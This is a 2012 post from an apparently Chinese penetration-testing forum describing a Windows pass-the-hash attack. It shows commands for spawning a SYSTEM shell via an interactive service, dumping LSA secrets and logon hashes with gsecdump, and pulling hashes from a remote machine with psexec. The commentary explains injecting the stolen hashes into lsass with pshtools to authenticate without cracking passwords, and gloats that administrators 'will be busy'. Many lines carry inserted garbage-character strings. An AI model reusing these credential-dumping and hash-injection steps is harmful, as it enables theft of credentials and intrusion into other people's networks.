中国网络渗透测试联盟

标题: HASH注入式攻击 [打印本页]
作者: admin    时间: 2012-11-6 21:09
标题: HASH注入式攻击
o get a DOS Prompt as NT system:
& m) \$ J6 M/ ?" |: u: j/ L( P7 y3 K# S6 Z# w% Q( c/ w
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact. E8 w) I2 }8 P" ?
[SC] CreateService SUCCESS
" D' @* e6 E" G
- @! z8 r6 u- j+ ^7 G" i- |C:\>sc start shellcmdline7 l# f! l  E( p! X0 @
[SC] StartService FAILED 1053:
! |8 |/ C- j% ]* v: i
1 d$ S/ _2 q6 M8 V6 ~2 O5 o# L" NThe service did not respond to the start or control request in a timely fashion., B- a1 |7 v" e7 i
3 Q% Z, F  y1 W# m. ]
C:\>sc delete shellcmdline4 w7 H2 Q+ }5 H6 k$ u) {0 x
[SC] DeleteService SUCCESS) ~( w$ v7 D9 U2 [( ~& K* X
# P, d5 U' a% y- W) x$ G' n6 [$ g
------------/ z/ r- A( h% z) Y* R9 }

4 K9 p) A  o/ e$ [, @$ ^8 LThen in the new DOS window:
) ^& x  A. N. y& i6 e, F  g/ l" B0 F- b0 ?% |5 x5 x
Microsoft Windows XP [Version 5.1.2600]
( a3 V. Q$ n; C$ T9 X, `# c(C) Copyright 1985-2001 Microsoft Corp.
( V1 W  w' w/ C+ \0 ~1 g1 B! n+ \& z7 ^2 A1 O2 \6 }2 Z
C:\WINDOWS\system32>whoami
# y1 ^; n( X, g5 xNT AUTHORITY\SYSTEM0 v. H; T7 d' G  r2 w0 d- g$ r

, F5 q- @+ W$ J$ z' S. VC:\WINDOWS\system32>gsecdump -h
6 g- u9 K0 P6 y& @4 a1 |4 i0 dgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se); U% N: m. D- ]( K, H
usage: gsecdump [options]
3 o. k6 h1 O2 h4 y: x% ?
) [" m( [* F- Y; ?2 O* i5 ]) @options:
# s1 W7 Q  }5 B) k% J-h [ --help ] show help
" C4 @/ @4 a7 B' y-a [ --dump_all ] dump all secrets, G8 B; g" D% y% }8 h" \7 J
-l [ --dump_lsa ] dump lsa secrets; x3 v/ t, [8 Y- Y' j1 }! h
-w [ --dump_wireless ] dump microsoft wireless connections
6 X' D  S7 a! x-u [ --dump_usedhashes ] dump hashes from active logon sessions
, z" V( D7 B" j+ j" V9 x* r9 p-s [ --dump_hashes ] dump hashes from SAM/AD
' b- [2 h: }' z9 d6 I" X' B- K8 V6 B2 n9 s9 g  F9 Y+ a2 i
Although I like to use:8 i7 X* R* H" D; r- ?+ A) c

) l; }% p  f0 c+ e& @PsExec v1.83 - Execute processes remotely& T" h5 b; G  ]9 w2 R7 C. m; S! h
Copyright (C) 2001-2007 Mark Russinovich2 b# p- ]9 r* q
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
5 m5 V+ d7 Z9 \, v4 e8 i4 J8 L7 P/ u% g) \6 u" y1 }' w
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT7 m. ^, @. S7 u0 b) r

+ G" B2 I: _. p. A& vto get the hashes from active logon sessions of a remote system.
( p* ?% y+ v& r. K$ u! V8 u) u) L! K* q
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
6 L0 @0 _' z# {4 h. s9 q/ I$ z- V0 T7 T  y+ `
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.- G5 H9 L1 W4 V) L2 O! n7 m: b
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]( \! I0 Q+ ~! c
1 s  N/ M. t/ Z
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
& B/ r9 B- k5 G+ C. A9 F



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2